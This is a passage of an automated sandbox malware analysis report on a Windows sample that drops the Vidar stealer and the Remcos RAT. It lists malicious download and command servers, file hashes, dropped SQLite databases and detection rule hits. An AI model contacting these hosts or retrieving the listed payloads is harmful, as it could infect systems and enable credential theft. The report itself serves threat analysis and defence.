                                                                                      https://ac.ecosia.org/autocomplete?q=12600711246403711407151220.3.drfalse
                                                                                        high
                                                                                        https://search.yahoo.com?fr=crmas_sfpyaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.drfalse
                                                                                          high
                                                                                          http://mardukoff.info/g9ecOb3jd/index.phpcodedyaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://t.me/solonichatcolo1dtemp.zipMozilla/5.0yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, host[1].exe.0.dr, svchost[1].dll.0.dr, svchost.dll.0.drfalse
                                                                                            high
                                                                                            http://transdi.org/host.exe=oyaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            http://95.141.41.12/n9yaALNupJCH.exe, 00000000.00000003.1353892271.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315724068.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353866017.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1171005042.0000000001582000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279466486.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302613093.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302659925.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377001563.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279466486.0000000001581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=12600711246403711407151220.3.drfalse
                                                                                              high
                                                                                              http://mardukoff.info/g9ecOb3jd/index.phprgyaALNupJCH.exe, 00000000.00000003.1025833709.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000152E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs
                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              81.19.131.36
                                                                                              unknownRussian Federation
                                                                                              24658IVC-ASRUtrue
                                                                                              116.202.2.169
                                                                                              unknownGermany
                                                                                              24940HETZNER-ASDEfalse
                                                                                              192.185.131.188
                                                                                              pixcode.com.mxUnited States
                                                                                              46606UNIFIEDLAYER-AS-1USfalse
                                                                                              95.141.41.12
                                                                                              unknownItaly
                                                                                              49367ASSEFLOWAmsterdamInternetExchangeAMS-IXITtrue
                                                                                              157.90.36.211
                                                                                              transdi.orgUnited States
                                                                                              766REDIRISRedIRISAutonomousSystemESfalse
                                                                                              178.237.33.50
                                                                                              geoplugin.netNetherlands
                                                                                              8455ATOM86-ASATOM86NLfalse
                                                                                              149.154.167.99
                                                                                              t.meUnited Kingdom
                                                                                              62041TELEGRAMRUfalse
                                                                                              IP
                                                                                              127.0.0.127
                                                                                              Joe Sandbox Version:38.0.0 Beryl
                                                                                              Analysis ID:1315647
                                                                                              Start date and time:2023-09-28 06:01:08 +02:00
                                                                                              Joe Sandbox Product:CloudBasic
                                                                                              Overall analysis duration:0h 9m 47s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                              Number of analysed new started processes analysed:23
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample file name:yaALNupJCH.exe
                                                                                              Original Sample Name:b2ee13e6988e57f6731c20da3459c8dc.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.rans.troj.spyw.expl.evad.winEXE@8/17@144/8
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 100%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 99%
                                                                                              • Number of executed functions: 95
                                                                                              • Number of non-executed functions: 269
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe
                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                              • Excluded IPs from analysis (whitelisted): 20.189.173.21
                                                                                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, tse1.mm.bing.net, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, g.bing.com, watson.telemetry.microsoft.com, arc.msn.com
                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                              • Report size exceeded maximum capacity and may have missing network information.
                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              TimeTypeDescription
                                                                                              06:01:50API Interceptor17191790x Sleep call for process: yaALNupJCH.exe modified
                                                                                              06:02:05API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                              No context
                                                                                              No context
                                                                                              No context
                                                                                              No context
                                                                                              No context
                                                                                              Process:C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3041002, page size 2048, file counter 10, database pages 58, cookie 0x4a, schema 4, UTF-8, version-valid-for 10
                                                                                              Category:dropped
                                                                                              Size (bytes):118784
                                                                                              Entropy (8bit):1.2127563488623585
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:DL/8dpUXbSzTPJTH6N4Vu1BqiOk1n7PrH9Lo3LoM:DL/inbK4Vu1AiBn7b9Lo7p
                                                                                              MD5:CF4BF362C0121E29AE6768346E953BAA
                                                                                              SHA1:584EF6F627B7AE18B0A540DBD62019ACCE1421D8
                                                                                              SHA-256:6ADEFD517E02B79AB1AD336AD4DB2A08D0783B54AA92E99597E28AEDA142075F
                                                                                              SHA-512:8EBA10CFB8B62C547A9BA1DE6EF698D47DC09FB94B789ABE35765E107FFFA231EF4F22F5419AA2E84D54A931723DC9E23681482E57D315AA4FB8FD58818DAE10
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:SQLite format 3......@ .......:...........J......................................................f............2........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3041002, page size 2048, file counter 10, database pages 58, cookie 0x4a, schema 4, UTF-8, version-valid-for 10
                                                                                              Category:dropped
                                                                                              Size (bytes):118784
                                                                                              Entropy (8bit):1.2127563488623585
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:DL/8dpUXbSzTPJTH6N4Vu1BqiOk1n7PrH9Lo3LoM:DL/inbK4Vu1AiBn7b9Lo7p
                                                                                              MD5:CF4BF362C0121E29AE6768346E953BAA
                                                                                              SHA1:584EF6F627B7AE18B0A540DBD62019ACCE1421D8
                                                                                              SHA-256:6ADEFD517E02B79AB1AD336AD4DB2A08D0783B54AA92E99597E28AEDA142075F
                                                                                              SHA-512:8EBA10CFB8B62C547A9BA1DE6EF698D47DC09FB94B789ABE35765E107FFFA231EF4F22F5419AA2E84D54A931723DC9E23681482E57D315AA4FB8FD58818DAE10
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:SQLite format 3......@ .......:...........J......................................................f............2........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3041002, file counter 13, database pages 39, cookie 0x43, schema 4, UTF-8, version-valid-for 13
                                                                                              Category:dropped
                                                                                              Size (bytes):163840
                                                                                              Entropy (8bit):1.3946502694018108
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:9GswsRsO8DVsTDESksWsr8cV/T4XdzwWAyk1x782SqR:9GswsRsO8DVsTDEZsWsr8cV/T4XdzwWu
                                                                                              MD5:AAAAEEC8464A1F2726F1C7EB1490672F
                                                                                              SHA1:185241D1808FE5B6C27A4EDA59BDE8DA1D7FD914
                                                                                              SHA-256:C2FE86A37BF9A8F4D3A7F841C420E8A4760FEEFFBB1B185908C054A42D217BB1
                                                                                              SHA-512:285FC3D8E2A48CE061B2523CF9B4F0D74A6EF121FE7465AD4D2DD9FB090993253ED9C1B7650E6BA072E472CC71BA6469CFC0DE9F7BE069AC4E43EBCB011DEA29
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:SQLite format 3......@ .......'...........C......................................................f.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3041002, file counter 28, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 28
                                                                                              Category:dropped
                                                                                              Size (bytes):28672
                                                                                              Entropy (8bit):1.8754789561675447
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:cejhLnwke2HOPYeTV8C5sL9Dv50Rwhba5DXMcF0GM6TepkPU7MimZgudiv:cXB6C5O7ORwE5Qj56rU7MisDu
                                                                                              MD5:4A1934EA620642696D920AAAC846E305
                                                                                              SHA1:FE1D8E2CFBAFE98413609C3C77F5685E1EEEA73B
                                                                                              SHA-256:ECC80D57F50C1A3E6B9066E76E7A313833E1FCA67369CFF798EF61CC193497E3
                                                                                              SHA-512:9188522FC94D578F8AD726FA4BB27A35A107562F6755C0BA6883B5EA0F409D666AA7FC93319805C94DDB832FAEB5D8A956BF6FEEC3668EF02A372FDAAB4D434C
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:SQLite format 3......@ ..........................................................................f..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3041002, file counter 13, database pages 39, cookie 0x43, schema 4, UTF-8, version-valid-for 13
                                                                                              Category:dropped
                                                                                              Size (bytes):163840
                                                                                              Entropy (8bit):1.3946502694018108
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:9GswsRsO8DVsTDESksWsr8cV/T4XdzwWAyk1x782SqR:9GswsRsO8DVsTDEZsWsr8cV/T4XdzwWu
                                                                                              MD5:AAAAEEC8464A1F2726F1C7EB1490672F
                                                                                              SHA1:185241D1808FE5B6C27A4EDA59BDE8DA1D7FD914
                                                                                              SHA-256:C2FE86A37BF9A8F4D3A7F841C420E8A4760FEEFFBB1B185908C054A42D217BB1
                                                                                              SHA-512:285FC3D8E2A48CE061B2523CF9B4F0D74A6EF121FE7465AD4D2DD9FB090993253ED9C1B7650E6BA072E472CC71BA6469CFC0DE9F7BE069AC4E43EBCB011DEA29
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:SQLite format 3......@ .......'...........C......................................................f.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3041002, page size 2048, file counter 3, database pages 26, cookie 0x1c, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):53248
                                                                                              Entropy (8bit):0.83744704020136
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:5XH0NFeymDlGvKLwy0Obn8MouOioeDomFqLm:F0NQlGjJa7DB
                                                                                              MD5:5A8897272B634D28751949B925A3FF4B
                                                                                              SHA1:A44AC70766BA831C922C932550D2E380476CF5E3
                                                                                              SHA-256:9A4A256FA3B71C5C9B1C7A092694EBE853996A5EDBB2ED52B969ABBC2AE1B304
                                                                                              SHA-512:00F4DCFD3F2DCF611AA0764B79A37185F6670290EE8554D8DB0394281FA87A312AAA490AC35FC3884E96E3464200094D0CD129ADEDB1D4C8998F3425C7A51BC5
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:SQLite format 3......@ ..........................................................................f.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):65536
                                                                                              Entropy (8bit):1.1059234151728974
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:qVD8PHqMnJajT9BKzggk/u7sXS274It8:vPqMnJajpUk/u7sXX4It8
                                                                                              MD5:D27528534FB44D0A7BEAC65E4FAF14FD
                                                                                              SHA1:878CC5217DA44C78AFCC22F8685B0EB72C22ED8B
                                                                                              SHA-256:14FA71875CAC68E9F1A799F84AB8F5EB800B89CC88391B1A63E4C45E0FFF0ACB
                                                                                              SHA-512:B05051460DC4560DD02F8576D49B72F5C4C9FF1455EC4EA7F1FC7039E288F43FA84A613B9F88222162BDE85258C3B572A8D11F1C51F82309CBE4911E4FEA1079
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.0.3.4.7.3.2.2.9.2.9.1.5.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.0.3.4.7.3.2.3.4.2.9.1.4.7.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.6.b.b.f.5.4.5.-.3.4.7.9.-.4.8.3.5.-.b.f.e.0.-.3.a.9.b.c.7.e.c.0.1.e.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.4.c.f.4.3.b.2.-.8.c.6.e.-.4.e.3.2.-.8.5.3.a.-.e.6.4.b.a.2.8.7.a.9.b.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.A.L.N.u.p.J.C.H...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.a.8.-.0.0.0.1.-.0.0.2.8.-.1.e.9.a.-.5.d.8.5.c.0.f.1.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.d.b.a.5.4.a.0.1.d.5.5.7.3.4.f.9.0.f.5.d.f.5.6.7.d.b.d.b.7.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.3.b.e.7.b.e.7.0.9.6.1.a.3.8.1.c.4.8.d.3.5.b.a.7.d.3.7.a.d.d.0.7.a.3.e.4.7.7.a.3.!.y.a.A.L.N.u.p.J.C.H...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:Mini DuMP crash report, 15 streams, Thu Sep 28 04:02:03 2023, 0x1205a4 type
                                                                                              Category:dropped
                                                                                              Size (bytes):124316
                                                                                              Entropy (8bit):1.9824329035571402
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:5SJJiksJAihpKY3wr8abaTacNi2Fh8R2gq59FDQrqDQ:c8JAihWATb0R2gMLDkqM
                                                                                              MD5:68AC272A1F628AB28499C3BA36325BA9
                                                                                              SHA1:299C3FB19D04DFF0985284462DA79AE32A0C3CFB
                                                                                              SHA-256:6F3AF91624C434735E8E8435EB2451029E5E6F3F6CCA4F4A437DB1A6320C83E6
                                                                                              SHA-512:F2DF40A037999932795405F3E49CFE2EA7B5DED6D8D9424A0150F9F67DE3AD14E58B98C4DD4430A84B95F3F38E3D28BD870688826F4064F2C62632DA4260D6FB
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:MDMP....... ..........e........................d...(.......$....'..........$T..........`.......8...........T...........XN..D............'...........)...................................................................U...........B......4*......GenuineIntelW...........T..............e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):8372
                                                                                              Entropy (8bit):3.7099766761451254
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:Rrl7r3GLNiPw6dH6Y3R6AgmfvdS7K+prM89b3Vsfy9m:RrlsNiY696YB6AgmfvdS7/3ufB
                                                                                              MD5:C27878783F17D9B9705A6D56391AA258
                                                                                              SHA1:E648D96B25C7557BFD40AADFA4AE6010B0F9F629
                                                                                              SHA-256:2CE8E1C18B456ED8387B556E315ACB97ADEDD34B9F79EA716EB5B8D5CA65DB53
                                                                                              SHA-512:42631AEB8DF7571A457879DDEE293EAFDDC3AF95AF0C62E29F64F7D220E2C742A1B5857410A05F80F13EB7351FEA48CD1F360E682DE11EC14AFD989BAD7B2BE8
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.9.2.<./.P.i.d.>.......
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):4613
                                                                                              Entropy (8bit):4.517169981598317
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:cvIwSD8zsYJgtWI9P/Wgc8sqYjw8fm8M4JSNVZFM+q8iu4kxOar4d:uITfe0ugrsqYxJSTI9nkxOar4d
                                                                                              MD5:16CC19EF936C2D4A7A5ED66716D5FE12
                                                                                              SHA1:7E22B8DA44C3863483A7A82147E6A124E28CFA86
                                                                                              SHA-256:B7D0C515FDB1C4D218E1BD20D78B82729AB672AC18437B95E899B8C18F857FFC
                                                                                              SHA-512:B427A927219CB1F2C5B7972A51100C36EBAE85C63283E3054B8540E181CC29753ABC4002104273DEC3AE0C9C58E27518F93384665A2B534A2DA6D528409D45F4
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2237112" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                              Process:C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):322560
                                                                                              Entropy (8bit):6.597312773404436
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:QmTK+XavNsTl/UUa5PI4AFuGIe/EH1/RJwpQ6hOnkN6:QYTZoh0EH1/RJweF
                                                                                              MD5:C0E52C2A2F9B11D3361B2DAA096B6D96
                                                                                              SHA1:40EFD6D940C2A8729544FF1F938EE896F2043BD1
                                                                                              SHA-256:31477F61830426105B5A9B61B32BD1D398804AFAF660F3417800218F70CC721D
                                                                                              SHA-512:D9C609D0146347582F705FE76B5DA8BFA40149B9751BDAF906FE1C8CDBEEF4F1039FDC0A957E7E76A0C9E42F8738E7B7188D59B5845FE791CDE1D66D2E95C31C
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exe, Author: Joe Security
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 63%
                                                                                              Reputation:low
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9I..X'.X'.X'.....X'.....X'......X'. ..X'. ..X'.X&..X'......X'.....X'.Rich.X'.........PE..L...0n.e.................|...........q............@..........................P............@.....................................x................................D..................................pM..@............................................text....z.......|.................. ..`.rdata..............................@..@.data....R...........z..............@....reloc...U.......V..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):962
                                                                                              Entropy (8bit):5.0231167558795455
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:tkbsYnd6UGkMyGWKyMPVGAD07f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw750m9K:qbsodVauKyM8tvXhNlT3/7xcFWro
                                                                                              MD5:25789CDADC88D2B1EB254FB69F1D7CD1
                                                                                              SHA1:5B37BE0CB37815955D836AC070587D8453C309EA
                                                                                              SHA-256:052360ECD79C967CEBF0037B08B75D07326EF110D502D344479B9849DDC7D7F8
                                                                                              SHA-512:1C358B305B9978591CD5880A283906773E287D43062E13F0C44CFEE0C5FE5C3BDAB9640587EC808D364A2926A392A855537DDADFA86097300B428628332A6469
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:{. "geoplugin_request":"154.16.192.235",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7425",. "geoplugin_longitude":"-73.9877",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                              Process:C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):494080
                                                                                              Entropy (8bit):6.594703017804104
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:Y/7iPrcL3ArwhBq7Kjsn9iHGXg0lwGS9MNNhdFvPxps9gsAOZZuAXec7N47ov:Y/uPq3AfK496Gw0lwGXN3pvs/Zuy48v
                                                                                              MD5:8A214A5CD5C1E3249831BC1739F468CA
                                                                                              SHA1:CEC69FE9CD31DFB468F5A1D49DFC8D9ADAFEBC2B
                                                                                              SHA-256:739C8AB2E4107EE34EF9C92D4B355042DF3336661F7BE39C9D17199379397846
                                                                                              SHA-512:FC05154ED0807E2BDE9CC5F9A131F907A897378749A8696602DE69945CF694DB001B4CD0319074F17E2A37EE58B1361130C9DD4C568A8E2A9F1521625B02EDE6
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, Author: unknown
                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, Author: unknown
                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, Author: ditekSHen
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:low
